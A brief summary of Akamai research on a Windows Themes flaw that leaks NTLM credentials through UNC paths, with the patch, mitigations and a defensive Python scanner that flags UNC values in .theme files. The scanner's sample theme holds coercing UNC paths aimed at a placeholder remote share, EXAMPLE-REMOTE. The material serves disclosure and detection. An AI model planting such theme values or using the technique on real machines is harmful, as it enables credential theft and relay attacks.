Akamai security researcher Tomer Peled discovered a spoofing vulnerability in Microsoft Themes that allows an attacker to coerce a victim's machine into sending its NTLM credentials.
The vulnerability affects all Windows versions and was fixed in the January 2024 Patch Tuesday release.
Exploitation requires only that the victim download a theme file; the authentication coercion is then triggered automatically.
The attack works by changing values in the theme file to UNC paths that point to an attacker-controlled server, which causes the victim's machine to send its NTLM credentials to that server.
With those NTLM credentials, an attacker can perform an NTLM relay attack or attempt to crack the victim's password.
Microsoft patched the vulnerability by adding checks for UNC paths in theme files.
Mitigation involves blocking NTLM authentication over SMB, applying group policies, and implementing microsegmentation.
The vulnerability was disclosed to Microsoft in September 2023 and patched in January 2024.
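As an added illustration of the UNC-path check described above (example code written for this summary, not the Akamai post's code or Microsoft's patch), the following Python scanner parses a .theme file, which uses INI syntax, and reports every setting whose value is a UNC path, whatever the key name. The sample theme and the EXAMPLE-REMOTE host are constructed, and the key names in the sample are assumed from the general .theme format rather than taken from the post.

```python
"""Flag UNC path values in Windows .theme files.

Added example, not code from the Akamai post or from Microsoft's patch.
The post says the attack rewrites theme values into UNC paths pointing at
a remote server; this scanner parses a theme file (INI syntax) and reports
every setting whose value is a UNC path, regardless of key name.
"""
import configparser
import re
from typing import List, Tuple

# A UNC path begins with \\host\share (or the forward-slash form //host/share).
UNC_RE = re.compile(r"^\s*(\\\\|//)[^\\/\s]+[\\/][^\\/\s]+")


def is_unc_path(value: str) -> bool:
    """True if the value refers to a remote share rather than a local file."""
    return UNC_RE.match(value) is not None


def find_unc_values(theme_text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) for every theme setting that is a UNC path."""
    parser = configparser.ConfigParser(
        interpolation=None,   # theme values contain %SystemRoot% etc.; do not expand
        strict=False,         # tolerate duplicate keys in hand-edited files
        delimiters=("=",),
    )
    parser.optionxform = str  # keep key names as written in the file
    parser.read_string(theme_text.lstrip("\ufeff"))  # drop a BOM if present
    hits: List[Tuple[str, str, str]] = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if value is not None and is_unc_path(value):
                hits.append((section, key, value))
    return hits


def scan_theme_file(path: str) -> List[Tuple[str, str, str]]:
    """Read a .theme file from disk (Windows often writes them as UTF-16)."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = data.decode("utf-16")
    else:
        text = data.decode("utf-8-sig", errors="replace")
    return find_unc_values(text)


# Constructed sample: EXAMPLE-REMOTE is a placeholder host, not a real one.
# Key names are ordinary .theme keys assumed for the example; the summary
# above does not say which keys the researcher used.
SAMPLE_THEME = r"""; constructed sample theme
[Theme]
DisplayName=Sample Theme
BrandImage=\\EXAMPLE-REMOTE\share\brand.png

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
TileWallpaper=0

[VisualStyles]
Path=\\EXAMPLE-REMOTE\share\theme.msstyles
ColorStyle=NormalColor
"""

if __name__ == "__main__":
    for section, key, value in find_unc_values(SAMPLE_THEME):
        print(f"UNC path in [{section}] {key} = {value}")
```

Because the check is key-agnostic, it flags a remote path in any field rather than only the ones an attacker is known to have used, which makes it a reasonable triage step for theme files arriving through mail or download quarantine on hosts that have not yet received the January 2024 update.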
Full post: https://www.akamai.com/blog/security-research/leaking-ntlm-credentials-through-windows-themes